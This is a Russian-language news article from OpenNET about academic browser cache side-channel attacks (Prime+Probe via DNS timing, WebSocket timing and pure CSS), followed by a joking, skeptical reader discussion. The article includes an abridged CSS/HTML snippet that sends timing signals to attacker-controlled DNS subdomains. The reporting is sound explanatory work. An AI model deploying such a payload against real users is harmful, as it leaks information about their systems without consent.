The OpenNET Project / Index page

[ новости /+++ | форум | wiki | теги | ]

Атака по извлечению данных из кэша CPU, реализуемая в web-браузере без JavaScript

09.03.2021 14:18

Группа исследователей из нескольких американских, израильских и австралийских университетов разработала три работающих в web-браузерах атаки для извлечения информации о содержимом процессорного кэша. Один метод работает в браузерах без JavaScript, а два остальных в обход существующих методов защиты от атак по сторонним каналам, в том числе применяемых в Tor browser и DeterFox. Код для демонстрации атак, а также необходимые для атак серверные компоненты, опубликованы на GitHub.

Для анализа содержимого кэша во всех атаках используется метод Prime+Probe, подразумевающий заполнение кэша эталонным набором значений и определение изменений через измерение времени доступа к ним при повторном заполнении. Для обхода присутствующих в браузерах механизмов защиты, мешающих точному измерению времени, в двух вариантах осуществляется обращение к подконтрольному атакующему DNS- или WebSocket-серверу, на котором ведётся лог времени поступления запросов. В одном варианте фиксированное время DNS-ответа используется в качестве эталона времени.

Измерений, выполненных с привлечением внешних DNS- или WebSocket-серверов, благодаря применению системы классификации на основе машинного обучения, оказалось достаточно для предсказания значений с точностью до 98% в самом оптимальном сценарии (в среднем 80-90%). Методы атаки протестированы на различных аппаратных платформах (Intel, AMD Ryzen, Apple M1, Samsung Exynos) и показали себя как универсальные.

В первом варианте атаки "DNS Racing" используется классическая реализация метода Prime+Probe, использующая массивы JavaScript. Отличия сводятся к применению внешнего таймера на базе DNS и обработчика onerror, срабатывающего при попытке загрузки изображения с несуществующего домена. Внешний таймер позволяет осуществить атаку Prime+Probe в браузерах, ограничивающих или полностью отключающих доступ к таймерам JavaScript.

Для DNS-сервера, размещённого в той же Ethernet-сети, точность таймера оценивается примерно в 2 мс, что достаточно для проведения атаки по сторонним каналам (для сравнения: точность штатного JavaScript-таймера в Tor Browser снижена до 100 мс). Для атаки контроль за DNS-сервером не требуется, так как время выполнения операции подбирается так, чтобы время ответа от DNS служило признаком более раннего завершения проверки (в зависимости от того раньше или позже сработал обработчик onerror делается вывод о скорости выполнения проверочной операции с кэшем).

Второй метод атаки "String and Sock" нацелен на обход методов защиты, ограничивающих низкоуровневое использование массивов в JavaScript. Вместо массивов в "String and Sock" задействованы операции с очень большими строками, размер которых выбирается так, чтобы переменная покрывала собой весь кэш LLC (Last level cache). Далее при помощи функции indexOf() в строке ищется небольшая подстрока, которая изначально отсутствует в исходной строке, т.е. операция поиска приводит к перебору всей строки. Так как размер строки соответствует размеру LLC-кэша, то сканирование позволяет выполнить операцию проверки кэша без манипуляции с массивами. Для измерения задержек вместо DNS задействовано обращение к подконтрольному атакующему WebSocket-серверу - перед началом и после завершения операции поиска в строке отправляются запросы, на основе которых на сервере вычисляется задержка, используемая для анализа содержимого кэша.

Третий вариант атаки "CSS PP0" реализован через HTML и CSS, и может работать в браузерах с отключённым JavaScript. Метод напоминает "String and Sock", но не привязан к JavaScript. В ходе атаки формируется набор CSS-селекторов, осуществляющих поиск по маске. Исходная большая строка, заполняющая кэш, задаётся через создание тега div с очень большим именем класса. Внутри размещается набор других div-ов со своими идентификаторами. Для каждого из этих вложенных div-ов определяется свой стиль с селектором, осуществляющем поиск подстроки. При отрисовке страницы браузер вначале пытается обработать внутренние div-ы, что приводит к выполнению операции поиска в большой строке. Поиск выполняется по заведомо отсутствующей маске и приводит к перебору всей строки, после чего срабатывает условие "not" и осуществляется попытка загрузки фонового изображения, ссылающегося на случайные домены:



   <style>
      #pp:not([class*='xjtoxg']) #s0 {background-image: url("https://qdlvibmr.helldomain.oy.ne.ro");}
      #pp:not([class*='gzstxf']) #s1 {background-image: url("https://licfsdju.helldomain.oy.ne.ro");}
      ...
   </style>
   <div id="pp" class="строка, размером около мегабайта">
      <div id="s0">X</div>
      <div id="s1">X</div>
      ...
   </div>

Поддомены обслуживаются на DNS-сервере атакующего, который может измерять задержки в получении запросов. На все запросы DNS-сервер выдаёт NXDOMAIN и ведёт лог точного времени обращений. В результате обработки набора div-ов на DNS-сервер атакующего поступает серия запросов, задержки между которыми коррелируют с результатом проверки содержимого кэша.



  1. Главная ссылка к новости (https://orenlab.sise.bgu.ac.il...)
  2. OpenNews: Две атаки на механизм предсказания каналов кэша в процессорах AMD
  3. OpenNews: Реализация DDIO в чипах Intel допускает сетевую атаку по определению нажатий клавиш в сеансе SSH
  4. OpenNews: Эксплуатация уязвимости в DRAM-памяти через локальную сеть
  5. OpenNews: SPOILER - новая атака на механизм спекулятивного выполнения CPU Intel
  6. OpenNews: Раскрыты детали новой атаки на различные реализации TLS
Лицензия: CC-BY
Тип: Проблемы безопасности
Короткая ссылка: https://opennet.ru/54727-prime
Ключевые слова: prime, probe, attack
При перепечатке указание ссылки на opennet.ru обязательно
Обсуждение (121) Ajax | 1 уровень | Линейный | +/- | Раскрыть всё | RSS
  • 1.1, Аноним (1), 16:05, 09/03/2021 [ответить] [﹢﹢﹢] [ · · · ]  
  • +3 +/
    Опять?
     
     
  • 2.16, Аноним (-), 16:43, 09/03/2021 [^] [^^] [^^^] [ответить]  
  • +7 +/
    Сверлю камеры, отрываю микрофоны, работаю с телефонами, вебкамерами от стационарников и ноутбуков, холодильников и утюгов. 100руб. точка
     
     
  • 3.21, neAnonim (?), 17:02, 09/03/2021 [^] [^^] [^^^] [ответить]  
  • +10 +/
    хочу заказать ваши услуги по адресу на Лубянке. оплата после работы, на киви кошелек
     
  • 3.24, Аноним (-), 17:05, 09/03/2021 [^] [^^] [^^^] [ответить]  
  • +5 +/
    Ловлю голубей
    Обучаю навыкам передачи информации
     
     
  • 4.87, Аноним (87), 08:58, 10/03/2021 [^] [^^] [^^^] [ответить]  
  • +4 +/
    RFC1149 обучаете? Заверните два!
     
     
  • 5.108, TormoZilla (?), 13:25, 10/03/2021 [^] [^^] [^^^] [ответить]  
  • +/
    Просто добавьте памяти.
     
  • 3.31, заминированный тапок (ok), 17:16, 09/03/2021 [^] [^^] [^^^] [ответить]  
  • +1 +/
    а собественное производство шапочек из фольги у вас есть? (а лучше даже и фольги для шапочек из фольги, для надёжности)
     
     
  • 4.54, Владимир (??), 18:48, 09/03/2021 [^] [^^] [^^^] [ответить]  
  • +15 +/
    Шутки про шапочки из фольги смотрятся убого как минимум последние лет так пять, учитывая происходящее.
    Чаще всего так шутят деды за 40, которые так и не поняли, что эпоха изменилась.
    От создателей "Да кому я нужен-то!", "Да пусть следят!", "Мне нечего скрывать!".
     
     
  • 5.64, заминированный тапок (ok), 19:51, 09/03/2021 [^] [^^] [^^^] [ответить]  
  • +3 +/
    > Шутки про шапочки из фольги смотрятся убого как минимум последние лет так
    > пять, учитывая происходящее.
    > Чаще всего так шутят деды за 40, которые так и не поняли,
    > что эпоха изменилась.
    > От создателей "Да кому я нужен-то!", "Да пусть следят!", "Мне нечего скрывать!".

    и что же у тебя происходит?
    хотя да, шапочки уже нактуальны, уже давно пора шутить про алюминиевые стены в пол метра и бункер

     
     
  • 6.85, Аноним (85), 07:35, 10/03/2021 [^] [^^] [^^^] [ответить]  
  • +1 +/
    > алюминиевые

    Свинцовые же.

     
  • 6.88, Аноним (87), 09:01, 10/03/2021 [^] [^^] [^^^] [ответить]  
  • +/
    Да так, объем преследований за инакомыслие видите ли что-то как на дрожжах прет.

    А от чего полметровые алюминиевые стены защищают? Магнитное поле через них пролезет, тогда уж железные надо было. Или если от радиации - свинцовые. Хотя если алюминий девать некуда можно и полметра алюминия, конечно.

     
     
  • 7.134, 1 (??), 11:38, 15/03/2021 [^] [^^] [^^^] [ответить]  
  • +/
    Пустить ток по алюминиевой решётке и всё получится.
     
  • 5.126, Sem (??), 00:37, 11/03/2021 [^] [^^] [^^^] [ответить]  
  • +2 +/
    "Деды за 40"? ))) Никто еще не палил свой возраст так явно )
     
     
  • 6.127, Владимир (??), 02:43, 11/03/2021 [^] [^^] [^^^] [ответить]  
  • +/
    Наивный
     

  • 1.2, Gefest (?), 16:10, 09/03/2021 [ответить] [﹢﹢﹢] [ · · · ]  
  • +8 +/
    Надо запускать браузер на специальном ядре без кеша. Бггг
     
     
  • 2.10, Леголас (ok), 16:29, 09/03/2021 [^] [^^] [^^^] [ответить]  
  • +6 +/
    браузерам давно пора отделиться в свои собственные ОС
     
     
  • 3.17, Урри (ok), 16:45, 09/03/2021 [^] [^^] [^^^] [ответить]  
  • +13 +/
    Свои собственные ПК.

    ОС уже есть.

     
     
  • 4.32, заминированный тапок (ok), 17:18, 09/03/2021 [^] [^^] [^^^] [ответить]  
  • +/
    Свои собственные технологии на замену полупроводникам.

    ПК уже есть.

     
     
  • 5.36, Леголас (ok), 17:24, 09/03/2021 [^] [^^] [^^^] [ответить]  
  • +/
    квантовые вычисления же просто целина, кому как не браузерам пионерами из прикладного ПО выходить за рамки бита
     
     
  • 6.41, заминированный тапок (ok), 17:30, 09/03/2021 [^] [^^] [^^^] [ответить]  
  • +1 +/
    > квантовые вычисления же просто целина, кому как не браузерам пионерами из прикладного
    > ПО выходить за рамки бита

    ну конечно, не даром Электрон назван Электроном
    (и это не потому что жс-гуманитарии не могут в точные науки, но очень этого хотят)

    ведь вычисления в жс - это самая настоящая запутанность

     
  • 6.65, Здрасьте (?), 19:57, 09/03/2021 [^] [^^] [^^^] [ответить]  
  • +/
    Квантовые вычисления — совсем другой класс алгоритмов, там невозможно запрограммировать всё, что в голову придёт, только определённые алгоритмы.
     
     
  • 7.80, Аноним (80), 00:25, 10/03/2021 [^] [^^] [^^^] [ответить]  
  • –2 +/
    Бред несёшь. Вся классика, в которой ты живёшь, есть симуляция классики на квантовом компьютере под названием "Вселенная". Такая симуляция со всеми её дефектами называется квазиклассикой.
     
  • 7.89, Аноним (87), 09:02, 10/03/2021 [^] [^^] [^^^] [ответить]  
  • +/
    А где можно посмотреть полный список того что там можно запрограммировать? :)
     
  • 7.92, Аноним (92), 09:06, 10/03/2021 [^] [^^] [^^^] [ответить]  
  • +/
    Вспомнил: сериал 'разрабы.
     
  • 4.57, SR_team (ok), 19:23, 09/03/2021 [^] [^^] [^^^] [ответить]  
  • +1 +/
    хромбук тоже уже есть
     
     
  • 5.102, Аноним (102), 10:55, 10/03/2021 [^] [^^] [^^^] [ответить]  
  • +/
    Firefox OS была, померла
     
     
  • 6.109, TormoZilla (?), 13:29, 10/03/2021 [^] [^^] [^^^] [ответить]  
  • +/
    не вся: KaiOS
     
  • 6.132, Аноним (132), 20:50, 13/03/2021 [^] [^^] [^^^] [ответить]  
  • +/
    Webos оно теперь
     
     
  • 7.133, Аноним (132), 20:54, 13/03/2021 [^] [^^] [^^^] [ответить]  
  • +/
    Пля, те KaiOS... Не Webos..
     
  • 2.42, torvn77 (ok), 17:44, 09/03/2021 [^] [^^] [^^^] [ответить]  
  • –1 +/
    Это легко реализовать башсп
    том  с task, имхо правильнее ввести группы ядер и группы программ и программам из конкретной группы разрешать работать строго на определённой группе ядер.  

    Ну а чтобы не тормозило в каждой группе сделать поддгруппу из гипертрейдинговых ядер или ядер с общим L1/L2 кешем и высаживать на неё все медленные процессы

     
  • 2.60, dnsdns (?), 19:40, 09/03/2021 [^] [^^] [^^^] [ответить]  
  • +1 +/
    лучше вообще без ядер
    я обьявляю свой комп безъядерной зоной (с)
     

  • 1.3, Аноним (3), 16:11, 09/03/2021 [ответить] [﹢﹢﹢] [ · · · ]  
  • +5 +/
    как правильнее вебку заклеивать?
     
     
  • 2.15, Аноним (-), 16:39, 09/03/2021 [^] [^^] [^^^] [ответить]  
  • –2 +/
    Одавлживаешь у ближайшего анонима дрель со сверлом 1мм и высверливаеш дома все камеры - вебки, телефоны, утюги и тд. Покупаеш пиво, возвращаеш и распиваете вместе пиво.
     
     
  • 3.129, Аноним (129), 16:55, 11/03/2021 [^] [^^] [^^^] [ответить]  
  • +/
    Высверлили вебки чтобы пива попить? Как-то это подозрительно.
     
  • 2.19, НяшМяш (ok), 16:53, 09/03/2021 [^] [^^] [^^^] [ответить]  
  • +2 +/
    Дрелью и сверлом десяткой.
     
     
  • 3.20, Аноним (20), 16:59, 09/03/2021 [^] [^^] [^^^] [ответить]  
  • +5 +/
    Зачем десяткой, когда есть Gentoo
     
     
  • 4.23, neAnonim (?), 17:05, 09/03/2021 [^] [^^] [^^^] [ответить]  
  • +13 +/
    проще поставить freebsd. гарантированно не работает Bluetooth и вебка, из соображений безопасности
     
     
  • 5.39, анонн (ok), 17:29, 09/03/2021 [^] [^^] [^^^] [ответить]  
  • +5 +/
    > проще поставить freebsd. гарантированно не работает Bluetooth и вебка, из соображений безопасности

    Источник "Полное собрание поверий опеннета о БЗДах, том 146"?


     
  • 5.40, vz_2 (?), 17:29, 09/03/2021 [^] [^^] [^^^] [ответить]  
  • +1 +/
    А как же Intel ME и AMD PSP, там же Minix-подобная система крутиться может?
     
     
  • 6.90, Аноним (87), 09:03, 10/03/2021 [^] [^^] [^^^] [ответить]  
  • +/
    Тут уже дрель не катит, придется лазером в процессоре дырочку в лишнем гаденыше прожечь.
     
  • 5.77, Аноним (77), 22:01, 09/03/2021 [^] [^^] [^^^] [ответить]  
  • –1 +/
    Трогали, только менее грубо...
     
  • 3.106, InuYasha (??), 12:55, 10/03/2021 [^] [^^] [^^^] [ответить]  
  • +/
    Лайфхак в копилку. В ноуте отключил проводок, в герметичном тлф выжег лазером. Снаружи ничего не видно.
     
  • 2.53, Аноним (53), 18:25, 09/03/2021 [^] [^^] [^^^] [ответить]  
  • +3 +/
    Тогда все уязвимости будут находить злоумышленники, но никто об этом не узнает и не исправит.
     

  • 1.6, Big Robert TheTables (?), 16:18, 09/03/2021 [ответить] [﹢﹢﹢] [ · · · ]  
  • +2 +/
    нужно изолировать какое-то ядро через isolcpu  в командной строку ядра и затем тасксетить браузер на это самое ядро.

     
     
  • 2.9, absurd (?), 16:25, 09/03/2021 [^] [^^] [^^^] [ответить]  
  • +10 +/
    Нужно использовать отдельный комп на каждую вкладку браузера
     
     
  • 3.14, Аноним (14), 16:38, 09/03/2021 [^] [^^] [^^^] [ответить]  
  • +4 +/
    Сейчас еще пару фреймворков на фреймворках допишут - и придется.
     
  • 3.26, Аноним (-), 17:08, 09/03/2021 [^] [^^] [^^^] [ответить]  
  • +1 +/
    Рутковская тебя услышала
     

  • 1.11, Аноним (11), 16:33, 09/03/2021 [ответить] [﹢﹢﹢] [ · · · ]  
  • –1 +/
    2021 год пока только начался если что :)
     
     
  • 2.25, Леголас (ok), 17:05, 09/03/2021 [^] [^^] [^^^] [ответить]  
  • +9 +/
    эм, ну как бы уже третий месяц идёт себе шагает... отлично встретил ты 2021, видимо)
     
     
  • 3.81, Аноним (81), 00:26, 10/03/2021 [^] [^^] [^^^] [ответить]  
  • +1 +/
    "А мужики-то и не знают..."
     
  • 3.86, Аноним (85), 07:38, 10/03/2021 [^] [^^] [^^^] [ответить]  
  • +/
    В прошлом году самый ппц как раз в середине-конце марта был, так что ждём.
     
     
  • 4.91, Аноним (-), 09:06, 10/03/2021 [^] [^^] [^^^] [ответить]  
  • –1 +/
    Вообще-то он только начался. А вот в апреле и мае разогнался до нормальных масштабов, когда жмуриков стало некуда класть.
     

  • 1.12, Аноним (-), 16:36, 09/03/2021 [ответить] [﹢﹢﹢] [ · · · ]  
  • –3 +/
    Для прохождения отаке включи жабаскрипт.
     
     
  • 2.50, Noname (??), 18:06, 09/03/2021 [^] [^^] [^^^] [ответить]  
  • +4 +/
    > Третий вариант атаки "CSS PP0" реализован через HTML и CSS

    Казалось бы

     
  • 2.78, Аноним (78), 22:39, 09/03/2021 [^] [^^] [^^^] [ответить]  
  • +3 +/
    Боюсь, только выключенный компьютер защищен от атак. И то не точно.
     

  • 1.18, Аноним (18), 16:49, 09/03/2021 [ответить] [﹢﹢﹢] [ · · · ]  
  • +4 +/
    что-то я не понял.
    атака позволяет получить содержимое кеша.... а он разве не шифруется или сегментируется?
    на кой хер получать кучу несвязанных байт?
     
     
  • 2.47, Амоним (?), 17:57, 09/03/2021 [^] [^^] [^^^] [ответить]  
  • +3 +/
    Новость написана настолько коряво что непонятно в чем суть. А суть в том что извлекаются вовсе не данные из кэша, а данные про кэш. Забиваем кэш своей строкой, через Х миллисекунд проверям что от нее осталось. И так появляется возможность организации скрытого канала передачи информации. Или возможность заявить что обойдена защита от утечки по сторонним каналам. Или написать новость в духе "все пропало, шэф" чтобы попасть на главные страницы.
     
     
  • 3.67, Gogi (??), 20:23, 09/03/2021 [^] [^^] [^^^] [ответить]  
  • +/
    > И так появляется возможность организации скрытого канала передачи информации

    Вообще ничё не понял. Был кэш. Мы его переполнили. Теперь мы знаем размер кэша. ДАЛЬШЕ ЧТО? Мы же всё равно не получим данные оттуда.

     
     
  • 4.71, Амоним (?), 21:02, 09/03/2021 [^] [^^] [^^^] [ответить]  
  • +2 +/
    Другой процесс в это время модулирует загрузку кэша. Так то напрямую ему может быть запрещен выход в интернет. Теперь браузер может  посдмотреть что тот вытворяет  с кэшем, и передать кому надо. В реальности уязвимость интересна разве что специалистам. Но подается так чтобы смогла попасть на главную.
     
     
  • 5.103, Аноним (102), 11:02, 10/03/2021 [^] [^^] [^^^] [ответить]  
  • +/
    Про Spectre и Meltdown вначале тоже говорили "интересная только спецам", некоторые до сих пор это проповедуют на всех форумах не в силах принять, что их CPU из-за патчей теперь медленнее работают и проповедуют отключение защиты. А тому что вы описали применение в реальной жизни гарантированно найдется, это в уме такую схему трудно представить за один раз, а CPU будет ее миллионы раз крутить и выгода атакующим от этого будет.
     
     
  • 6.104, Амоним (?), 11:34, 10/03/2021 [^] [^^] [^^^] [ответить]  
  • +2 +/
    Достаточно ввести рандомную задержку в ДНС сетевой стэк и вся эта атака рассыпае... большой текст свёрнут, показать
     
     
  • 7.107, fuggy (ok), 13:03, 10/03/2021 [^] [^^] [^^^] [ответить]  
  • +/
    Есть же реальная атака основанная на потреблении энергии компьютером, чтобы определить загрузку процессора. Да эта атака теоретически обоснована как возможная и даже proof-of-concept делали. Но применение в реальной системе почти нереально. Только если тебя держат в бункере с компьютером и тебе нужно с помощью азбуки Морзе передать информацию во внешний мир, запуская ресурсоёмкую программу чтобы делать точки-тире.
     

  • 1.22, Аноним (22), 17:03, 09/03/2021 [ответить] [﹢﹢﹢] [ · · · ]  
  • +3 +/
    > Третий вариант атаки "CSS PP0" реализован через HTML и CSS

    Дожили, CSS переметнулся на сторону зла... Те, кто отключает в браузере JS, пусть теперь отключают и CSS.

     
     
  • 2.28, Аноним (-), 17:10, 09/03/2021 [^] [^^] [^^^] [ответить]  
  • +1 +/
    А в тор браузере оно работает?
     
  • 2.33, kissmyass (?), 17:19, 09/03/2021 [^] [^^] [^^^] [ответить]  
  • –1 +/
    или лучше сразу кислород ))
     
     
  • 3.93, Аноним (-), 09:07, 10/03/2021 [^] [^^] [^^^] [ответить]  
  • +/
    Не поможет, компьютеры и без кислорода работать могут в принципе.
     
     
  • 4.113, kissmyass (?), 14:58, 10/03/2021 [^] [^^] [^^^] [ответить]  
  • +/
    > Не поможет, компьютеры и без кислорода работать могут в принципе.

    зато ты не можешь )) нет пользователя - нет багов ))

     
  • 2.37, Lex (??), 17:26, 09/03/2021 [^] [^^] [^^^] [ответить]  
  • +2 +/
    Ууу.. на css такие «атаки» пилились, что фиг отловишь..

    Кстати, во многих почтовых сервисах у писем не просто так режутся почти все стили( даже кастомный шрифт и тени не добавить, чтоб работало и на гуглопочте и в яндексе и в мейле и в яблопочте )

     
  • 2.48, Noname (??), 18:06, 09/03/2021 [^] [^^] [^^^] [ответить]  
  • +6 +/
    Был Web 1.0 и нормально было
     
  • 2.76, xm (ok), 21:50, 09/03/2021 [^] [^^] [^^^] [ответить]  
  • –1 +/
    Он там и был, просто долго это скрывал.
     
  • 2.94, Аноним (-), 09:08, 10/03/2021 [^] [^^] [^^^] [ответить]  
  • +/
    > Дожили, CSS переметнулся на сторону зла...

    Does "CSS is turing complete" rings a bell?

     

  • 1.27, Аноним (27), 17:09, 09/03/2021 [ответить] [﹢﹢﹢] [ · · · ]  
  • –2 +/
    >Методы атаки протестированы на различных аппаратных платформах (Intel, AMD Ryzen, Apple M1, Samsung Exynos) и показали себя как универсальные.

    ARM, RISC-V ?

     
     
  • 2.38, Аноним (38), 17:27, 09/03/2021 [^] [^^] [^^^] [ответить]  
  • +1 +/
    Там 2 арма и 2 х86. Я бы на power посмотрел.
     
     
  • 3.51, Аноним (-), 18:07, 09/03/2021 [^] [^^] [^^^] [ответить]  
  • +/
    Такое же pewето твой power, просто никому ненужное. На abacus смотри, за весь лайфтайм ни одного cve. Вот где надежность.
     
  • 3.58, Аноним (27), 19:34, 09/03/2021 [^] [^^] [^^^] [ответить]  
  • +/
    у самсунг то еще пронятно, но у эпл какая-то гибридная хрень
     
     
  • 4.68, Аноним (38), 20:31, 09/03/2021 [^] [^^] [^^^] [ответить]  
  • –1 +/
    > у самсунг то еще пронятно, но у эпл какая-то гибридная хрень

    Насколько я понял амд ровно то же самое с х86 делает уже давно, только тут арм и чуть иначе огорожен. Что-то я слышал это всё ещё из 90 тянется, у амд тогда был geode полученный у cyrix начала 90х. Универсальные ПК просто на некоторое время отвоевали процент, сегодня же у них доля очень маленькая и это уже не важно.

     

  • 1.29, Аноним (29), 17:12, 09/03/2021 [ответить] [﹢﹢﹢] [ · · · ]  
  • +1 +/
    Минуточку. Но такие же вещи обычно публикуют уже когда фиксы есть? Ведь правда? Пожалуйста, скажите, что правда.
    Г-споди, какой же ошибкой были все эти технологии!
     
     
  • 2.43, Kuromi (ok), 17:46, 09/03/2021 [^] [^^] [^^^] [ответить]  
  • +3 +/
    Фиксов нету, этож все аппаратные "баги". Впрочем еще при вскрытии МелтДаун руководство Интолла прямо сказало что проблема решится...покупкой нового проца, от Intel само собой. Ведь время продавать процы, проци не продадут себя сами. Все потенциальные дыры закрыть не удастся (и как показала практика латают одну, надодят другую). Зато они туда новые суперсекурные технологии вроде TPM и SGX встроят, которые правда не вас защищают, а тех кто по настоящему владеют вашим железом - поставщиков софта, контента и сервисов.
    Кое какие методы борьбы внедрили разработчики браузеров на волне истерики, но сейчас например Мозилла демонтирует некоторые из них в связи с отсутствием случае реального использования уязвимонсти. Ну  идо кучи они мешают оптимизациям в браузере.
     
  • 2.52, Аноним (52), 18:13, 09/03/2021 [^] [^^] [^^^] [ответить]  
  • –1 +/
    > такие же вещи

    Какие "такие"? В чем практический смысл данной "атаки"? Ну получили какие-то данные из кэша, и че? Че с ними делать? Распечатать и на холодильник прикрепить? Хакер и солонка, блин.

     
     
  • 3.95, Аноним (-), 09:09, 10/03/2021 [^] [^^] [^^^] [ответить]  
  • +/
    Когда такими данными оказываются логины-пароли-ключи-сертификаты-номеракред... ммм... с ними довольно много чего можно делать так то :)))
     
  • 2.112, fuggy (ok), 14:26, 10/03/2021 [^] [^^] [^^^] [ответить]  
  • +/
    А когда уже пофиксят атаку на количество потребляемой энергии процессором, или атака на громкость работы жёсткого диска, или атака на чтение информации с помощью электромагнитного излучения монитора? Боюсь что никогда.
    Несколько примеров таких экзотических атак.
    https://www.opennet.ru/opennews/art.shtml?num=48432
    https://www.opennet.ru/opennews/art.shtml?num=47355
     

  • 1.30, Михрютка (ok), 17:15, 09/03/2021 [ответить] [﹢﹢﹢] [ · · · ]  
  • +1 +/
    сходил по демо ссылкам 2 000,4 000,4 000,2 000,2 000,4 000,0 000,2 000,2 000,0 ... большой текст свёрнут, показать
     
  • 1.34, Аноним (-), 17:23, 09/03/2021 [ответить] [﹢﹢﹢] [ · · · ]  
  • +/
    DeterFox - чудо чудное
     
     
  • 2.44, Kuromi (ok), 17:52, 09/03/2021 [^] [^^] [^^^] [ответить]  
  • +/
    Ага, ты только посмотри на лица и фамилии его создателей. Будь там еще и китайский университет, то троянчик был бы обеспечен.
     

  • 1.45, Аноним (87), 17:52, 09/03/2021 [ответить] [﹢﹢﹢] [ · · · ]  
  • +/
    в интернет выходят только раз, как лосось на нерест, и всю жизнь к этому готовятся, потом шахта, бадья, соль..
     
  • 1.46, Онаним (?), 17:53, 09/03/2021 [ответить] [﹢﹢﹢] [ · · · ]  
  • +/
    У меня такое ощущение, что это суровый hoax.
     
     
  • 2.96, Аноним (-), 09:12, 10/03/2021 [^] [^^] [^^^] [ответить]  
  • +/
    CSS так-то тюринг-полный... угадай что это значит.
     
     
  • 3.98, Онаним (?), 09:52, 10/03/2021 [^] [^^] [^^^] [ответить]  
  • +/
    И что, что он условно тюринг-полный?
    Чтобы добиться правильных таймингов и размеров данных при анализе задержек - тюринг-полноты недостаточно.
     
  • 3.118, Аноним (118), 17:09, 10/03/2021 [^] [^^] [^^^] [ответить]  
  • +/
    Слизевики тоже тьюринг полные, но что-то кэш процессора они читать не умеют.
     
  • 2.99, Онаним (?), 10:00, 10/03/2021 [^] [^^] [^^^] [ответить]  
  • +/
    Больше всего меня порадовал замер задержек через DNS.
    Ничего, что даже в локальных сетях джиттер ныне на порядки выше необходимой для замера точности?

    Нет, это таки hoax в расчёте на тех, кто просто читает. И не переубедите.

     

  • 1.55, Аноним (55), 18:51, 09/03/2021 [ответить] [﹢﹢﹢] [ · · · ]  
  • –1 +/
    Вот бы кот браузер на новом, безопасном движке написал без дырявого раста
     
     
  • 2.72, Кот (??), 21:06, 09/03/2021 [^] [^^] [^^^] [ответить]  
  • +4 +/
    Не напишу даже на дырявом расте. У меня -- лапки.
     
     
  • 3.83, Аноним (-), 03:59, 10/03/2021 [^] [^^] [^^^] [ответить]  
  • +/
    Секрет консервы раскрыт!
     

  • 1.59, ыы (?), 19:37, 09/03/2021 [ответить] [﹢﹢﹢] [ · · · ]  
  • +/
    Мне вот непонятен один момент: ну вот есть ядро. заполнили его кэш прецизионным мусором но как только начали чегото кудато посылать на ДНС- кэш автоматически заполнился другим прецизионным мусором.. о запросах к этим самым ДНС... И мы узнали длину нашего  прецизионного мусора ... ну и ...и чего?
     
     
  • 2.62, Онаним (?), 19:44, 09/03/2021 [^] [^^] [^^^] [ответить]  
  • +2 +/
    Да вот я тоже два раза всё это писательство перечитал, и у меня до сих пор ощущение, что это просто псевдонаучный hoax.
     

  • 1.61, ыы (?), 19:41, 09/03/2021 [ответить] [﹢﹢﹢] [ · · · ]  
  • +/
    >точность таймера оценивается примерно в 2 мс

    я правильно понимаю что время обновления кэша при таком таймере  должно быть сильно больше? на процессоре 4 Ghz большую часть времени кэш будет содержать статичные данные? Специально для целей теста?

     
     
  • 2.74, Аноним (74), 21:30, 09/03/2021 [^] [^^] [^^^] [ответить]  
  • +1 +/
    Единичные измерения с подобной точностью ничего не дадут, а статистика по многочисленным повторам уже позволяет играть вероятностями. Они миллионы раз повторяют проверки, а потом статистику скармливают нейронной сети, которая вычисляет наиболее вероятные значения.
     

  • 1.66, Аноним (66), 20:00, 09/03/2021 [ответить] [﹢﹢﹢] [ · · · ]  
  • +3 +/
    Пора переходить на Gemini.
     
     
  • 2.110, Аноним (110), 14:10, 10/03/2021 [^] [^^] [^^^] [ответить]  
  • +/
    Вперед, потом поделишься впечатлениями, только через гэмини засылай бгггг
     

  • 1.73, ааноним (?), 21:06, 09/03/2021 [ответить] [﹢﹢﹢] [ · · · ]  
  • +/
    Вот мне интересно, как эти уязвимости находят? Просто уму непостижимо. И есть ли у нас такие специалисты?
     
     
  • 2.75, Сейд (ok), 21:43, 09/03/2021 [^] [^^] [^^^] [ответить]  
  • –1 +/
    Есть, в Гродненском государственном университете.
     

  • 1.79, pin (??), 23:26, 09/03/2021 [ответить] [﹢﹢﹢] [ · · · ]  
  • +1 +/
    DNS over HTTPS в тему.
     
  • 1.82, Аноним (-), 03:57, 10/03/2021 [ответить] [﹢﹢﹢] [ · · · ]  
  • –1 +/
    > или WebSocket-серверу

    А как _это_ без JS работает?

     
     
  • 2.101, Аноним (101), 10:43, 10/03/2021 [^] [^^] [^^^] [ответить]  
  • +/
    Прочитай внимательно новость и не тупи.
     

  • 1.84, Аноним (84), 07:33, 10/03/2021 [ответить] [﹢﹢﹢] [ · · · ]  
  • +/
    вирусы на css, ну-ну... походу совсем упоролись
     
     
  • 2.97, Аноним (-), 09:13, 10/03/2021 [^] [^^] [^^^] [ответить]  
  • +/
    Тюринг, гад, выдал идею что все тюринг-полные языки эквивалентны. Так что вот вам...
     

  • 1.105, fuggy (ok), 12:41, 10/03/2021 [ответить] [﹢﹢﹢] [ · · · ]  
  • +1 +/
    Либо плохо перевели новость, либо я что-то не понял.
    Атака на браузеры TorBrowser без JavaScript. Читаю. Первая атака: используем массивы JavaScript. Вторая атака: используем функцию  indexOf. Ладно третья атака действительно без JavaScript: через CSS обращаемся к подконтрольному нам DNS. Но ведь TorBrowser проксирует доступ к DNS через сеть Tor. И как они в этой сети смогли измерить задержку в 2мс?
    Дальше какова цель атаки? Прочитать кэш CPU. Чтобы что? Чтобы узнать что  нём находится находится та строка, которую мы передали и по которой ищем?
    Ведь подразумевается заполнение кэша эталонным набором значений.
    С помощью CSS мы ищем в строке, которую мы передали, по подстроке, которую мы указали, и замеряем время. Но где тут чтение из кэша?
     
     
  • 2.111, Аноним (-), 14:12, 10/03/2021 [^] [^^] [^^^] [ответить]  
  • +/
    Чичяз моден фузинг, это как раньше было модно искать по айпи.
     
  • 2.114, ыы (?), 15:17, 10/03/2021 [^] [^^] [^^^] [ответить]  
  • +1 +/
    >И как они в этой сети смогли измерить задержку в 2мс?

    Ну, как мне объяснили выше- статистически можно  повысить разрешение до бесконечности.
    Прочли миллион арз - статистически обработали (сейчас модно статистику называть нейронными сетями) и на линии с задержкой 500 мс получили разрешенеи 2 мс... Чудеса науки.... а прочитали миллиард раз- и получили разрешение 1 пикосекунду... Както так...

     
     
  • 3.115, Онаним (?), 16:35, 10/03/2021 [^] [^^] [^^^] [ответить]  
  • +/
    Это если у тебя джиттер менее 2мс.
    Если у тебя джиттер более 2мс - никакие нейронные сети тебе уже не помогут
     
     
